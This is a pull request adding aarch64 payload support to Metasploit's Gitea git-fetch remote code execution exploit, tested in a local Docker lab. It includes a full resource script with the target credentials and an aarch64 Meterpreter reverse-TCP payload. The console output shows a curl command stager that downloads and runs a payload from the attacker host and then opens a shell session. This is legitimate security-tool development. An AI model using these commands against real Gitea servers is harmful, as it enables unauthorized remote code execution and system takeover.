### PR TITLE
gitea_git_fetch_rce aarch64 payload support

### DIFF
--- a/modules/exploits/multi/http/gitea_git_fetch_rce.rb
+++ b/modules/exploits/multi/http/gitea_git_fetch_rce.rb
@@ -52,7 +52,7 @@ class MetasploitModule < Msf::Exploit::Remote
             'Linux Dropper',
             {
               'Platform' => 'linux',
-              'Arch' => [ARCH_X86, ARCH_X64],
+              'Arch' => [ARCH_X86, ARCH_X64, ARCH_AARCH64],
               'Type' => :linux_dropper,
               'CmdStagerFlavor' => %i[curl wget echo printf],
               'DefaultOptions' => {


### PR DESCRIPTION
This is a very minor change for the `modules/exploits/multi/http/gitea_git_fetch_rce.rb` exploit.  The current module only lists support for X86.  I have been experimenting with Gitea in docker on Arm for a school project.  I needed to run the `aarch64` meterpreter reverse shell.

The fix was a one line change to add ARCH_AARCH64 to the list of supported payload archtiecrures.

## Verification
I have tested this locally.  You need to have an exploitable Gitea instance running.  With that I ran the following resource script using `msfconsole -r exploit.rc`:

```txt
use exploit/multi/http/gitea_git_fetch_rce

set RHOSTS 127.0.0.1      
set RPORT 3000 
                 
set USERNAME gitadmin
set PASSWORD Password1!

set SRVHOST 172.17.0.1
set SRVPORT 9000

# set PAYLOAD linux/x64/meterpreter/reverse_tcp
set PAYLOAD linux/aarch64/meterpreter/reverse_tcp

set LHOST 172.17.0.1
set LPORT 4444
set ReverseListenerBindAddress 0.0.0.0

set VERBOSE true

exploit
```

Here is the output:

```

[*] Started reverse TCP handler on 0.0.0.0:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Version detected: 1.16.6
[*] Using URL: http://172.17.0.1:9000/
[*] Adding hardcoded uri /api/v1/version
[*] Adding hardcoded uri /api/v1/settings/api
[*] Adding hardcoded uri /api/v1/repos/
[*] Adding hardcoded uri /api/v1/repos//pulls
[*] Adding hardcoded uri /api/v1/repos//topics
[*] Using URL: http://172.17.0.1:9000/OY6iiESa95o2YH
[*] Generated command stager: ["curl -so /tmp/GsYCCzFl http://172.17.0.1:9000/OY6iiESa95o2YH;chmod +x /tmp/GsYCCzFl;/tmp/GsYCCzFl;rm -f /tmp/GsYCCzFl"]
[*] Executing command: curl -so /tmp/GsYCCzFl http://172.17.0.1:9000/OY6iiESa95o2YH;chmod +x /tmp/GsYCCzFl;/tmp/GsYCCzFl;rm -f /tmp/GsYCCzFl
[*] Creating repository "Uuboyv77kJCV"
[+] Repository created
[*] Migrating repository
[*] Client 172.17.0.2 (curl/7.79.1) requested /OY6iiESa95o2YH
[*] Sending payload to 172.17.0.2 (curl/7.79.1)
[*] Transmitting intermediate midstager...(256 bytes)
[*] Sending stage (989564 bytes) to 172.17.0.2
[*] Meterpreter session 1 opened (172.17.0.1:4444 -> 172.17.0.2:56324) at 2025-10-26 19:20:16 -0500
[*] Command Stager progress - 100.00% done (117/117 bytes)
[*] Successfully cleanup repository 'Uuboyv77kJCV'
[*] Successfully cleanup repository 'JA8FQ7X0rm'

meterpreter > 
```

I believe this is a fairly low risk change, but as I am new to Metasploit development, I welcome any and all feedback.

Thanks for the amazing work!
